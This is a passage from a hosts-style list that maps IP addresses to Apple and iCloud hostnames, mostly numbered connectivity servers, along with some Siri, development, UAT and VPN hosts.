st10109001c.connectivity.icloud.com\n17.164.0.64 p09-conduit.connectivity.icloud.com\n17.164.0.65 st10309002c.connectivity.icloud.com\n17.164.0.66 st10709002c.connectivity.icloud.com\n17.164.0.67 st10609002c.connectivity.icloud.com\n17.164.0.68 st10209002c.connectivity.icloud.com\n17.164.0.69 st10409002c.connectivity.icloud.com\n17.164.0.70 st10809002c.connectivity.icloud.com\n17.164.0.81 st10509002c.connectivity.icloud.com\n17.164.0.89 st10109002c.connectivity.icloud.com\n17.164.0.98 st10309004c.connectivity.icloud.com\n17.164.0.99 st10709004c.connectivity.icloud.com\n17.164.0.100 st10609004c.connectivity.icloud.com\n17.164.0.101 st10209004c.connectivity.icloud.com\n17.164.0.102 st10409004c.connectivity.icloud.com\n17.164.0.103 st10809004c.connectivity.icloud.com\n17.164.0.104 st10509004c.connectivity.icloud.com\n17.164.0.105 st10109004c.connectivity.icloud.com\n17.164.0.106 st10309003c.connectivity.icloud.com\n17.164.0.107 st10709003c.connectivity.icloud.com\n17.164.0.108 st10609003c.connectivity.icloud.com\n17.164.0.109 st10209003c.connectivity.icloud.com\n17.164.0.110 st10409003c.connectivity.icloud.com\n17.164.0.111 st10809003c.connectivity.icloud.com\n17.164.0.112 st10509003c.connectivity.icloud.com\n17.164.0.113 st10109003c.connectivity.icloud.com\n17.164.1.35 enroll.vpp.itunes.apple.com\n17.165.180.10 st14p03sa-vc001.siri.apple.com\n17.165.192.10 st14p04sa-vc001.siri.apple.com\n17.167.135.58 p11-conduit.connectivity.icloud.com\n17.167.135.86 st10111001c.connectivity.icloud.com\n17.167.135.87 st10111002c.connectivity.icloud.com\n17.167.135.88 st10111003c.connectivity.icloud.com\n17.167.135.89 st10111004c.connectivity.icloud.com\n17.167.135.90 st10211001c.connectivity.icloud.com\n17.167.135.91 st10211002c.connectivity.icloud.com\n17.167.135.92 st10211003c.connectivity.icloud.com\n17.167.135.93 st10211004c.connectivity.icloud.com\n17.167.135.94 st10311001c.connectivity.icloud.com\n17.167.135.95 st10311002c.connectivity.icloud.com\n17.167.135.96 st10311003c.connectivity.icloud.com\n17.167.135.97 st10311004c.connectivity.icloud.com\n17.167.135.98 st10411001c.connectivity.icloud.com\n17.167.135.99 st10411002c.connectivity.icloud.com\n17.167.135.100 st10411003c.connectivity.icloud.com\n17.167.135.101 st10411004c.connectivity.icloud.com\n17.167.135.102 st10511001c.connectivity.icloud.com\n17.167.135.103 st10511002c.connectivity.icloud.com\n17.167.135.104 st10511003c.connectivity.icloud.com\n17.167.135.105 st10511004c.connectivity.icloud.com\n17.167.135.106 st10611001c.connectivity.icloud.com\n17.167.135.107 st10611002c.connectivity.icloud.com\n17.167.135.108 st10611003c.connectivity.icloud.com\n17.167.135.109 st10611004c.connectivity.icloud.com\n17.167.135.110 st10711001c.connectivity.icloud.com\n17.167.135.111 st10711002c.connectivity.icloud.com\n17.167.135.112 st10711003c.connectivity.icloud.com\n17.167.135.113 st10711004c.connectivity.icloud.com\n17.167.135.114 st10811001c.connectivity.icloud.com\n17.167.135.115 st10811002c.connectivity.icloud.com\n17.167.135.116 st10811003c.connectivity.icloud.com\n17.167.135.117 st10811004c.connectivity.icloud.com\n17.167.136.13 p13-conduit.connectivity.icloud.com\n17.167.136.44 st10113001c.connectivity.icloud.com\n17.167.136.45 st10113002c.connectivity.icloud.com\n17.167.136.46 st10113003c.connectivity.icloud.com\n17.167.136.47 st10113004c.connectivity.icloud.com\n17.167.136.48 st10213001c.connectivity.icloud.com\n17.167.136.49 st10213002c.connectivity.icloud.com\n17.167.136.50 st10213003c.connectivity.icloud.com\n17.167.136.51 st10213004c.connectivity.icloud.com\n17.167.136.52 st10313001c.connectivity.icloud.com\n17.167.136.53 st10313002c.connectivity.icloud.com\n17.167.136.54 st10313003c.connectivity.icloud.com\n17.167.136.55 st10313004c.connectivity.icloud.com\n17.167.136.56 st10413001c.connectivity.icloud.com\n17.167.136.57 st10413002c.connectivity.icloud.com\n17.167.136.58 st10413003c.connectivity.icloud.com\n17.167.136.59 st10413004c.connectivity.icloud.com\n17.167.136.60 st10513001c.connectivity.icloud.com\n17.167.136.61 st10513002c.connectivity.icloud.com\n17.167.136.62 st10513003c.connectivity.icloud.com\n17.167.136.63 st10513004c.connectivity.icloud.com\n17.167.136.64 st10613001c.connectivity.icloud.com\n17.167.136.65 st10613002c.connectivity.icloud.com\n17.167.136.66 st10613003c.connectivity.icloud.com\n17.167.136.67 st10613004c.connectivity.icloud.com\n17.167.136.68 st10713001c.connectivity.icloud.com\n17.167.136.69 st10713002c.connectivity.icloud.com\n17.167.136.70 st10713003c.connectivity.icloud.com\n17.167.136.71 st10713004c.connectivity.icloud.com\n17.167.136.72 st10813001c.connectivity.icloud.com\n17.167.136.73 st10813002c.connectivity.icloud.com\n17.167.136.74 st10813003c.connectivity.icloud.com\n17.167.136.75 st10813004c.connectivity.icloud.com\n17.167.137.47 p15-conduit.connectivity.icloud.com\n17.167.137.48 st10115001c.connectivity.icloud.com\n17.167.137.49 st10115002c.connectivity.icloud.com\n17.167.137.50 st10115003c.connectivity.icloud.com\n17.167.137.51 st10115004c.connectivity.icloud.com\n17.167.137.52 st10215001c.connectivity.icloud.com\n17.167.137.53 st10215002c.connectivity.icloud.com\n17.167.137.54 st10215003c.connectivity.icloud.com\n17.167.137.55 st10215004c.connectivity.icloud.com\n17.167.137.56 st10315001c.connectivity.icloud.com\n17.167.137.57 st10315002c.connectivity.icloud.com\n17.167.137.58 st10315003c.connectivity.icloud.com\n17.167.137.59 st10315004c.connectivity.icloud.com\n17.167.137.60 st10415001c.connectivity.icloud.com\n17.167.137.61 st10415002c.connectivity.icloud.com\n17.167.137.62 st10415003c.connectivity.icloud.com\n17.167.137.63 st10415004c.connectivity.icloud.com\n17.167.137.64 st10515001c.connectivity.icloud.com\n17.167.137.65 st10515002c.connectivity.icloud.com\n17.167.137.66 st10515003c.connectivity.icloud.com\n17.167.137.67 st10515004c.connectivity.icloud.com\n17.167.137.68 st10615001c.connectivity.icloud.com\n17.167.137.69 st10615002c.connectivity.icloud.com\n17.167.137.70 st10615003c.connectivity.icloud.com\n17.167.137.71 st10615004c.connectivity.icloud.com\n17.167.137.72 st10715001c.connectivity.icloud.com\n17.167.137.73 st10715002c.connectivity.icloud.com\n17.167.137.74 st10715003c.connectivity.icloud.com\n17.167.137.75 st10715004c.connectivity.icloud.com\n17.167.137.76 st10815001c.connectivity.icloud.com\n17.167.137.77 st10815002c.connectivity.icloud.com\n17.167.137.78 st10815003c.connectivity.icloud.com\n17.167.137.79 st10815004c.connectivity.icloud.com\n17.167.138.54 p17-conduit.connectivity.icloud.com\n17.167.138.55 st10117001c.connectivity.icloud.com\n17.167.138.56 st10117002c.connectivity.icloud.com\n17.167.138.57 st10117003c.connectivity.icloud.com\n17.167.138.58 st10117004c.connectivity.icloud.com\n17.167.138.59 st10217001c.connectivity.icloud.com\n17.167.138.60 st10217002c.connectivity.icloud.com\n17.167.138.61 st10217003c.connectivity.icloud.com\n17.167.138.62 st10217004c.connectivity.icloud.com\n17.167.138.63 st10317001c.connectivity.icloud.com\n17.167.138.64 st10317002c.connectivity.icloud.com\n17.167.138.65 st10317003c.connectivity.icloud.com\n17.167.138.66 st10317004c.connectivity.icloud.com\n17.167.138.67 st10417001c.connectivity.icloud.com\n17.167.138.68 st10417002c.connectivity.icloud.com\n17.167.138.69 st10417003c.connectivity.icloud.com\n17.167.138.70 st10417004c.connectivity.icloud.com\n17.167.138.71 st10517001c.connectivity.icloud.com\n17.167.138.72 st10517002c.connectivity.icloud.com\n17.167.138.73 st10517003c.connectivity.icloud.com\n17.167.138.74 st10517004c.connectivity.icloud.com\n17.167.138.75 st10617001c.connectivity.icloud.com\n17.167.138.76 st10617002c.connectivity.icloud.com\n17.167.138.77 st10617003c.connectivity.icloud.com\n17.167.138.78 st10617004c.connectivity.icloud.com\n17.167.138.79 st10717001c.connectivity.icloud.com\n17.167.138.80 st10717002c.connectivity.icloud.com\n17.167.138.81 st10717003c.connectivity.icloud.com\n17.167.138.82 st10717004c.connectivity.icloud.com\n17.167.138.83 st10817001c.connectivity.icloud.com\n17.167.138.84 st10817002c.connectivity.icloud.com\n17.167.138.85 st10817003c.connectivity.icloud.com\n17.167.138.86 st10817004c.connectivity.icloud.com\n17.167.139.18 p19-conduit.connectivity.icloud.com\n17.167.139.51 st10119001c.connectivity.icloud.com\n17.167.139.52 st10119002c.connectivity.icloud.com\n17.167.139.53 st10119003c.connectivity.icloud.com\n17.167.139.54 st10119004c.connectivity.icloud.com\n17.167.139.55 st10219001c.connectivity.icloud.com\n17.167.139.56 st10219002c.connectivity.icloud.com\n17.167.139.57 st10219003c.connectivity.icloud.com\n17.167.139.58 st10219004c.connectivity.icloud.com\n17.167.139.59 st10319001c.connectivity.icloud.com\n17.167.139.60 st10319002c.connectivity.icloud.com\n17.167.139.61 st10319003c.connectivity.icloud.com\n17.167.139.62 st10319004c.connectivity.icloud.com\n17.167.139.63 st10419001c.connectivity.icloud.com\n17.167.139.64 st10419002c.connectivity.icloud.com\n17.167.139.65 st10419003c.connectivity.icloud.com\n17.167.139.66 st10419004c.connectivity.icloud.com\n17.167.139.67 st10519001c.connectivity.icloud.com\n17.167.139.68 st10519002c.connectivity.icloud.com\n17.167.139.69 st10519003c.connectivity.icloud.com\n17.167.139.70 st10519004c.connectivity.icloud.com\n17.167.139.71 st10619001c.connectivity.icloud.com\n17.167.139.72 st10619002c.connectivity.icloud.com\n17.167.139.73 st10619003c.connectivity.icloud.com\n17.167.139.74 st10619004c.connectivity.icloud.com\n17.167.139.75 st10719001c.connectivity.icloud.com\n17.167.139.76 st10719002c.connectivity.icloud.com\n17.167.139.77 st10719003c.connectivity.icloud.com\n17.167.139.78 st10719004c.connectivity.icloud.com\n17.167.139.79 st10819001c.connectivity.icloud.com\n17.167.139.80 st10819002c.connectivity.icloud.com\n17.167.139.81 st10819003c.connectivity.icloud.com\n17.167.139.82 st10819004c.connectivity.icloud.com\n17.167.140.9 p21-conduit.connectivity.icloud.com\n17.167.140.10 st10221003c.connectivity.icloud.com\n17.167.140.11 st10221004c.connectivity.icloud.com\n17.167.140.12 st10321001c.connectivity.icloud.com\n17.167.140.13 st10321002c.connectivity.icloud.com\n17.167.140.14 st10321003c.connectivity.icloud.com\n17.167.140.15 st10321004c.connectivity.icloud.com\n17.167.140.16 st10421001c.connectivity.icloud.com\n17.167.140.17 st10421002c.connectivity.icloud.com\n17.167.140.18 st10421003c.connectivity.icloud.com\n17.167.140.19 st10421004c.connectivity.icloud.com\n17.167.140.20 st10521001c.connectivity.icloud.com\n17.167.140.21 st10521002c.connectivity.icloud.com\n17.167.140.22 st10521003c.connectivity.icloud.com\n17.167.140.23 st10521004c.connectivity.icloud.com\n17.167.140.24 st10621001c.connectivity.icloud.com\n17.167.140.25 st10621002c.connectivity.icloud.com\n17.167.140.26 st10621003c.connectivity.icloud.com\n17.167.140.27 st10621004c.connectivity.icloud.com\n17.167.140.28 st10721001c.connectivity.icloud.com\n17.167.140.29 st10721002c.connectivity.icloud.com\n17.167.140.30 st10721003c.connectivity.icloud.com\n17.167.140.31 st10721004c.connectivity.icloud.com\n17.167.140.32 st10821001c.connectivity.icloud.com\n17.167.140.33 st10821002c.connectivity.icloud.com\n17.167.140.34 st10821003c.connectivity.icloud.com\n17.167.140.35 st10821004c.connectivity.icloud.com\n17.167.140.36 st10121001c.connectivity.icloud.com\n17.167.140.37 st10121002c.connectivity.icloud.com\n17.167.140.38 st10121003c.connectivity.icloud.com\n17.167.140.39 st10121004c.connectivity.icloud.com\n17.167.140.40 st10221001c.connectivity.icloud.com\n17.167.140.41 st10221002c.connectivity.icloud.com\n17.167.142.9 p23-conduit.connectivity.icloud.com\n17.167.142.40 st10123001c.connectivity.icloud.com\n17.167.142.48 st10123002c.connectivity.icloud.com\n17.167.142.49 st10123003c.connectivity.icloud.com\n17.167.142.50 st10123004c.connectivity.icloud.com\n17.167.142.51 st10223001c.connectivity.icloud.com\n17.167.142.52 st10223002c.connectivity.icloud.com\n17.167.142.53 st10223003c.connectivity.icloud.com\n17.167.142.54 st10223004c.connectivity.icloud.com\n17.167.142.55 st10323001c.connectivity.icloud.com\n17.167.142.56 st10323002c.connectivity.icloud.com\n17.167.142.57 st10323003c.connectivity.icloud.com\n17.167.142.58 st10323004c.connectivity.icloud.com\n17.167.142.59 st10423001c.connectivity.icloud.com\n17.167.142.60 st10423002c.connectivity.icloud.com\n17.167.142.61 st10423003c.connectivity.icloud.com\n17.167.142.62 st10423004c.connectivity.icloud.com\n17.167.142.63 st10523001c.connectivity.icloud.com\n17.167.142.64 st10523002c.connectivity.icloud.com\n17.167.142.65 st10523003c.connectivity.icloud.com\n17.167.142.66 st10523004c.connectivity.icloud.com\n17.167.142.67 st10623001c.connectivity.icloud.com\n17.167.142.68 st10623002c.connectivity.icloud.com\n17.167.142.69 st10623003c.connectivity.icloud.com\n17.167.142.70 st10623004c.connectivity.icloud.com\n17.167.142.71 st10723001c.connectivity.icloud.com\n17.167.142.72 st10723002c.connectivity.icloud.com\n17.167.142.73 st10723003c.connectivity.icloud.com\n17.167.142.74 st10723004c.connectivity.icloud.com\n17.167.142.75 st10823001c.connectivity.icloud.com\n17.167.142.76 st10823002c.connectivity.icloud.com\n17.167.142.77 st10823003c.connectivity.icloud.com\n17.167.142.78 st10823004c.connectivity.icloud.com\n17.167.144.11 p25-btmmconduit.connectivity.icloud.com\n17.167.144.43 st10125001c.connectivity.icloud.com\n17.167.144.44 st10125002c.connectivity.icloud.com\n17.167.144.45 st10125003c.connectivity.icloud.com\n17.167.144.46 st10125004c.connectivity.icloud.com\n17.167.144.47 st10225001c.connectivity.icloud.com\n17.167.144.48 st10225002c.connectivity.icloud.com\n17.167.144.49 st10225003c.connectivity.icloud.com\n17.167.144.50 st10225004c.connectivity.icloud.com\n17.167.144.51 st10325001c.connectivity.icloud.com\n17.167.144.52 st10325002c.connectivity.icloud.com\n17.167.144.53 st10325003c.connectivity.icloud.com\n17.167.144.54 st10325004c.connectivity.icloud.com\n17.167.144.55 st10425001c.connectivity.icloud.com\n17.167.144.56 st10425002c.connectivity.icloud.com\n17.167.144.57 st10425003c.connectivity.icloud.com\n17.167.144.58 st10425004c.connectivity.icloud.com\n17.167.144.59 st10525001c.connectivity.icloud.com\n17.167.144.60 st10525002c.connectivity.icloud.com\n17.167.144.61 st10525003c.connectivity.icloud.com\n17.167.144.62 st10525004c.connectivity.icloud.com\n17.167.144.63 st10625001c.connectivity.icloud.com\n17.167.144.64 st10625002c.connectivity.icloud.com\n17.167.144.65 st10625003c.connectivity.icloud.com\n17.167.144.66 st10625004c.connectivity.icloud.com\n17.167.144.67 st10725001c.connectivity.icloud.com\n17.167.144.68 st10725002c.connectivity.icloud.com\n17.167.144.69 st10725003c.connectivity.icloud.com\n17.167.144.70 st10725004c.connectivity.icloud.com\n17.167.144.71 st10825001c.connectivity.icloud.com\n17.167.144.72 st10825002c.connectivity.icloud.com\n17.167.144.73 st10825003c.connectivity.icloud.com\n17.167.144.74 st10825004c.connectivity.icloud.com\n17.167.224.5 vger.apple.com\n17.167.224.22 pv11p01sa-p01.siri.apple.com\n17.169.88.7 smp-device-lt.apple.com\n17.169.234.27 konaserviceuat.apple.com\n17.169.234.53 volumeitunesprogram-st-b.apple.com\n17.169.235.243 iaprvext-uat3.apple.com\n17.169.235.244 iaprvext-uat.apple.com\n17.169.235.249 iaprvext-uat4.apple.com\n17.169.236.227 rjvit.apple.com\n17.169.236.228 rjvt.apple.com\n17.169.237.237 ats-services-uat.apple.com\n17.169.238.26 nc1-dc2-origin-ext.mobileapp-dev2.apple.com\n17.169.238.28 nc1-dc1-storedev1-origin.apple.com\n17.169.238.29 nc1-dc2-storedev1-origin.apple.com\n17.169.238.36 nc1-dc1-storeqa2-gnvdownload.apple.com\n17.169.238.37 nc1-dc2-storeqa2-gnvdownload.apple.com\n17.169.238.38 nc1-dc1-origin-ext.mobileapp-dev1.apple.com\n17.169.238.42 nc1-dc2-origin-ext.mobileapp-dev1.apple.com\n17.169.238.47 nc1-dc1-origin-ext.mobileapp-dev3.apple.com\n17.169.238.48 nc1-dc2-origin-ext.mobileapp-dev3.apple.com\n17.169.238.49 nc1-dc1-origin-ext.mobileapp-dev2.apple.com\n17.169.238.56 sq-device-it2.apple.com\n17.169.238.59 deviceservices-external-it.apple.com\n17.169.238.60 deviceservices-external-ut.apple.com\n17.169.238.61 deviceservices-external-maint.apple.com\n17.171.1.201 mdn-bz-dcvpn.apple.com\n17.171.1.202 st1-02-13-bz-dcvpn-asa2.apple.com\n17.171.1.203 mdn-dcvpn3p.apple.com\n17.171.1.204 st1-02-14-03-bz-dcvpn-asa4.apple.com\n17.171.1.251 ivpn-mdn.apple.com\n17.171.1.253 idcvpn-mdn.apple.com\n17.171.1.254 mdn-bz-3pvpn.apple.com\n17.171.2.16 mdn-rover-ember01.apple.com\n17.171.2.17 mdn-rover-ember02.apple.com\n17.171.2.18 mdn-rover-ember03.apple.com\n17.171.2.66 pinova.apple.com\n17.171.11.252 verify-nc.apple.com\n17.171.12.218 rsvp-t-new.apple.com\n17.171.12.236 privftpuat.apple.com\n17.171.13.17 vlt-ehla-uat.apple.com\n17.171.13.236 itntrvlt-new.apple.com\n17.171.13.238 rsvp-at.apple.com\n17.171.13.239 rsvp-t.apple.com\n17.171.13.252 webgdvtws.apple.com\n17.171.13.253 webgdvitws.apple.com\n17.171.22.11 nc-geneva-upload.apple.com\n17.171.22.12 nc-geneva-download.apple.com\n17.171.24.32 sq-device-stage.apple.com\n17.171.26.252 nc1-carrier-services.apple.com\n17.171.26.253 nc2-carrier-services.apple.com\n17.171.27.85 nc1-ips-device-external.apple.com\n17.171.40.12 fdeserver-md.apple.com\n17.171.40.21 volumeitunesprogram-b.apple.com\n17.171.63.30 nserver5.apple.com\n17.171.63.40 nserver6.apple.com\n17.171.67.31 appletravel-us.apple.com\n17.171.69.20 jointventure-mdn.apple.com\n17.171.71.74 reserve.apple.com\n17.171.73.138 livetest.mobileapp.apple.com\n17.172.28.16 st11p01ad-approval.apple.com\n17.172.28.216 vg3-dev1ad.iad.apple.com\n17.172.28.217 vg3-dev1oo.iad.apple.com\n17.172.28.218 vg3-dev1cprad.iad.apple.com\n17.172.28.219 vg3-dev1cprcontent.iad.apple.com\n17.172.28.220 vg3-dev1cprfeed.iad.apple.com\n17.172.28.221 vg3-dev1cpr.iad.apple.com\n17.172.28.222 vg3-dev2ad.iad.apple.com\n17.172.28.223 vg3-dev2oo.iad.apple.com\n17.172.28.224 vg3-dev2cprad.iad.apple.com\n17.172.28.225 vg3-dev2cprcontent.iad.apple.com\n17.172.28.226 vg3-dev2cprfeed.iad.apple.com\n17.172.28.227 vg3-dev2cpr.iad.apple.com\n17.172.28.230 vg3-dev3ad.iad.apple.com\n17.172.28.231 vg3-dev3oo.iad.apple.com\n17.172.28.232 vg3-dev3cprad.iad.apple.com\n17.172.28.233 vg3-dev3cprcontent.iad.apple.com\n17.172.28.234 vg3-dev3cprfeed.iad.apple.com\n17.172.28.235 vg3-dev3cpr.iad.apple.com\n17.172.34.23 hblrcvrweb.icloud.com\n17.172.62.5 st10001001.connectivity.icloud.com\n17.172.62.6 st10101001.connectivity.icloud.com\n17.172.62.7 st10201001.connectivity.icloud.com\n17.172.62.8 st10301001.connectivity.icloud.com\n17.172.62.9 st10401001.connectivity.icloud.com\n17.172.62.10 st10501001.connectivity.icloud.com\n17.172.62.11 st10601001.connectivity.icloud.com\n17.172.62.12 st10701001.connectivity.icloud.com\n17.172.62.13 st10001002.connectivity.icloud.com\n17.172.62.14 st10101002.connectivity.icloud.com\n17.172.62.15 st10201002.connectivity.icloud.com\n17.172.62.16 st10301002.connectivity.icloud.com\n17.172.62.17 st10401002.connectivity.icloud.com\n17.172.62.18 st10501002.connectivity.icloud.com\n17.172.62.19 st10601002.connectivity.icloud.com\n17.172.62.20 st10701002.connectivity.icloud.com\n17.172.62.21 st10001003.connectivity.icloud.com\n17.172.62.22 st10101003.connectivity.icloud.com\n17.172.62.23 st10201003.connectivity.icloud.com\n17.172.62.24 st10301003.connectivity.icloud.com\n17.172.62.25 st10401003.connectivity.icloud.com\n17.172.62.26 st10501003.connectivity.icloud.com\n17.172.62.27 st10601003.connectivity.icloud.com\n17.172.62.28 st10701003.connectivity.icloud.com\n17.172.62.29 st10002004.connectivity.icloud.com\n17.172.62.30 st10102004.connectivity.icloud.com\n17.172.62.31 st10202004.connectivity.icloud.com\n17.172.62.32 st10302004.connectivity.icloud.com\n17.172.62.33 st10402004.connectivity.icloud.com\n17.172.62.34 st10502004.connectivity.icloud.com\n17.172.62.35 st10602004.connectivity.icloud.com\n17.172.62.36 st10702004.connectivity.icloud.com\n17.172.62.37 st10002005.connectivity.icloud.com\n17.172.62.38 st10102005.connectivity.icloud.com\n17.172.62.39 st10202005.connectivity.icloud.com\n17.172.62.40 st10302005.connectivity.icloud.com\n17.172.62.41 st10402005.connectivity.icloud.com\n17.172.62.42 st10502005.connectivity.icloud.com\n17.172.62.43 st10602005.connectivity.icloud.com\n17.172.62.44 st10702005.connectivity.icloud.com\n17.172.62.45 st10002006.connectivity.icloud.com\n17.172.62.46 st10102006.connectivity.icloud.com\n17.172.62.47 st10202006.connectivity.icloud.com\n17.172.62.48 st10302006.connectivity.icloud.com\n17.172.62.49 st10402006.connectivity.icloud.com\n17.172.62.50 st10502006.connectivity.icloud.com\n17.172.62.51 st10602006.connectivity.icloud.com\n17.172.62.52 st10702006.connectivity.icloud.com\n17.172.62.53 st10003007.connectivity.icloud.com\n17.172.62.54 st10103007.connectivity.icloud.com\n17.172.62.55 st10203007.connectivity.icloud.com\n17.172.62.56 st10303007.connectivity.icloud.com\n17.172.62.57 st10403007.connectivity.icloud.com\n17.172.62.58 st10503007.connectivity.icloud.com\n17.172.62.59 st10603007.connectivity.icloud.com\n17.172.62.60 st10703007.connectivity.icloud.com\n17.172.62.61 st10003008.connectivity.icloud.com\n17.172.62.62 st10103008.connectivity.icloud.com\n17.172.62.63 st10203008.connectivity.icloud.com\n17.172.62.64 st10303008.connectivity.icloud.com\n17.172.62.65 st10403008.connectivity.icloud.com\n17.172.62.66 st10503008.connectivity.icloud.com\n17.172.62.67 st10603008.connectivity.icloud.com\n17.172.62.68 st10703008.connectivity.icloud.com\n17.172.62.69 st10003009.connectivity.icloud.com\n17.172.62.70 st10103009.connectivity.icloud.com\n17.172.62.71 st10203009.connectivity.icloud.com\n17.172.62.72 st10303009.connectivity.icloud.com\n17.172.62.73 st10403009.connectivity.icloud.com\n17.172.62.74 st10503009.connectivity.icloud.com\n17.172.62.75 st10603009.connectivity.icloud.com\n17.172.62.76 st10703009.connectivity.icloud.com\n17.172.62.77 st10004010.connectivity.icloud.com\n17.172.62.78 st10104010.connectivity.icloud.com\n17.172.62.79 st10204010.connectivity.icloud.com\n17.172.62.80 st10304010.connectivity.icloud.com\n17.172.62.81 st10404010.connectivity.icloud.com\n17.172.62.82 st10504010.connectivity.icloud.com\n17.172.62.83 st10604010.connectivity.icloud.com\n17.172.62.84 st10704010.connectivity.icloud.com\n17.172.62.85 st10004011.connectivity.icloud.com\n17.172.62.86 st10104011.connectivity.icloud.com\n17.172.62.87 st10204011.connectivity.icloud.com\n17.172.62.88 st10304011.connectivity.icloud.com\n17.172.62.89 st10404011.connectivity.icloud.com\n17.172.62.90 st10504011.connectivity.icloud.com\n17.172.62.91 st10604011.connectivity.icloud.com\n17.172.62.92 st10704011.connectivity.icloud.com\n17.172.62.93 st10004012.connectivity.icloud.com\n17.172.62.94 st10104012.connectivity.icloud.com\n17.172.62.95 st10204012.connectivity.icloud.com\n17.172.62.96 st10304012.connectivity.icloud.com\n17.172.62.97 st10404012.connectivity.icloud.com\n17.172.62.98 st10504012.connectivity.icloud.com\n17.172.62.99 st10604012.connectivity.icloud.com\n17.172.62.100 st10704012.connectivity.icloud.com\n17.172.62.133 st10005018.connectivity.icloud.com\n17.172.62.134 st10105018.connectivity.icloud.com\n17.172.62.135 st10205018.connectivity.icloud.com\n17.172.62.136 st10305018.connectivity.icloud.com\n17.172.62.137 st10405018.connectivity.icloud.com\n17.172.62.138 st10505018.connectivity.icloud.com\n17.172.62.139 st10605018.connectivity.icloud.com\n17.172.62.140 st10705018.connectivity.icloud.com\n17.172.62.141 st10005017.connectivity.icloud.com\n17.172.62.142 st10105017.connectivity.icloud.com\n17.172.62.143 st10205017.connectivity.icloud.com\n17.172.62.144 st10305017.connectivity.icloud.com\n17.172.62.145 st10405017.connectivity.icloud.com\n17.172.62.146 st10505017.connectivity.icloud.com\n17.172.62.147 st10605017.connectivity.icloud.com\n17.172.62.148 st10705017.connectivity.icloud.com\n17.172.62.149 st10005019.connectivity.icloud.com\n17.172.62.150 st10105019.connectivity.icloud.com\n17.172.62.151 st10205019.connectivity.icloud.com\n17.172.62.152 st10305019.connectivity.icloud.com\n17.172.62.153 st10405019.connectivity.icloud.com\n17.172.62.154 st10505019.connectivity.icloud.com\n17.172.62.155 st10605019.connectivity.icloud.com\n17.172.62.156 st10705019.connectivity.icloud.com\n17.172.62.157 st10006020.connectivity.icloud.com\n17.172.62.158 st10106020.connectivity.icloud.com\n17.172.62.159 st10206020.connectivity.icloud.com\n17.172.62.160 st10306020.connectivity.icloud.com\n17.172.62.161 st10406020.connectivity.icloud.com\n17.172.62.162 st10506020.connectivity.icloud.com\n17.172.62.163 st10606020.connectivity.icloud.com\n17.172.62.164 st10706020.connectivity.icloud.com\n17.172.62.165 st10006021.connectivity.icloud.com\n17.172.62.166 st10106021.connectivity.icloud.com\n17.172.62.167 st10206021.connectivity.icloud.com\n17.172.62.168 st10306021.connectivity.icloud.com\n17.172.62.169 st10406021.connectivity.icloud.com\n17.172.62.170 st10506021.connectivity.icloud.com\n17.172.62.171 st10606021.connectivity.icloud.com\n17.172.62.172 st10706021.connectivity.icloud.com\n17.172.62.173 st10006022.connectivity.icloud.com\n17.172.62.174 st10106022.connectivity.icloud.com\n17.172.62.175 st10206022.connectivity.icloud.com\n17.172.62.176 st10306022.connectivity.icloud.com\n17.172.62.177 st10406022.connectivity.icloud.com\n17.172.62.178 st10506022.connectivity.icloud.com\n17.172.62.179 st10606022.connectivity.icloud.com\n17.172.62.180 st10706022.connectivity.icloud.com\n17.172.62.181 st10007023.connectivity.icloud.com\n17.172.62.182 st10107023.connectivity.icloud.com\n17.172.62.183 st10207023.connectivity.icloud.com\n17.172.62.184 st10307023.connectivity.icloud.com\n17.172.62.185 st10407023.connectivity.icloud.com\n17.172.62.186 st10507023.connectivity.icloud.com\n17.172.62.187 st10607023.connectivity.icloud.com\n17.172.62.188 st10707023.connectivity.icloud.com\n17.172.62.189 st10007024.connectivity.icloud.com\n17.172.62.190 st10107024.connectivity.icloud.com\n17.172.62.191 st10207024.connectivity.icloud.com\n17.172.62.192 st10307024.connectivity.icloud.com\n17.172.62.193 st10407024.connectivity.icloud.com\n17.172.62.194 st10507024.connectivity.icloud.com\n17.172.62.195 st10607024.connectivity.icloud.com\n17.172.62.196 st10707024.connectivity.icloud.com\n17.172.62.197 st10007025.connectivity.icloud.com\n17.172.62.198 st10107025.connectivity.icloud.com\n17.172.62.199 st10207025.connectivity.icloud.com\n17.172.62.200 st10307025.connectivity.icloud.com\n17.172.62.201 st10407025.connectivity.icloud.com\n17.172.62.202 st10507025.connectivity.icloud.com\n17.172.62.203 st10607025.connectivity.icloud.com\n17.172.62.204 st10707025.connectivity.icloud.com\n17.172.62.205 st10008026.connectivity.icloud.com\n17.172.62.206 st10108026.connectivity.icloud.com\n17.172.62.207 st10208026.connectivity.icloud.com\n17.172.62.208 st10308026.connectivity.icloud.com\n17.172.62.209 st10408026.connectivity.icloud.com\n17.172.62.210 st10508026.connectivity.icloud.com\n17.172.62.211 st10608026.connectivity.icloud.com\n17.172.62.212 st10708026.connectivity.icloud.com\n17.172.62.213 st10008027.connectivity.icloud.com\n17.172.62.214 st10108027.connectivity.icloud.com\n17.172.62.215 st10208027.connectivity.icloud.com\n17.172.62.216 st10308027.connectivity.icloud.com\n17.172.62.217 st10408027.connectivity.icloud.com\n17.172.62.218 st10508027.connectivity.icloud.com\n17.172.62.219 st10608027.connectivity.icloud.com\n17.172.62.220 st10708027.connectivity.icloud.com\n17.172.62.221 st10008028.connectivity.icloud.com\n17.172.62.222 st10108028.connectivity.icloud.com\n17.172.62.223 st10208028.connectivity.icloud.com\n17.172.62.224 st10308028.connectivity.icloud.com\n17.172.62.225 st10408028.connectivity.icloud.com\n17.172.62.226 st10508028.connectivity.icloud.com\n17.172.62.227 st10608028.connectivity.icloud.com\n17.172.62.228 st10708028.connectivity.icloud.com\n17.172.62.229 st10009029.connectivity.icloud.com\n17.172.62.230 st10109029.connectivity.icloud.com\n17.172.62.231 st10209029.connectivity.icloud.com\n17.172.62.232 st10309029.connectivity.icloud.com\n17.172.62.233 st10409029.connectivity.icloud.com\n17.172.62.234 st10509029.connectivity.icloud.com\n17.172.62.235 st10609029.connectivity.icloud.com\n17.172.62.236 st10709029.connectivity.icloud.com\n17.172.62.237 st10009030.connectivity.icloud.com\n17.172.62.238 st10109030.connectivity.icloud.com\n17.172.62.239 st10209030.connectivity.icloud.com\n17.172.62.240 st10309030.connectivity.icloud.com\n17.172.62.241 st10409030.connectivity.icloud.com\n17.172.62.242 st10509030.connectivity.icloud.com\n17.172.62.243 st10609030.connectivity.icloud.com\n17.172.62.244 st10709030.connectivity.icloud.com\n17.172.62.245 st10009031.connectivity.icloud.com\n17.172.62.246 st10109031.connectivity.icloud.com\n17.172.62.247 st10209031.connectivity.icloud.com\n17.172.62.248 st10309031.connectivity.icloud.com\n17.172.62.249 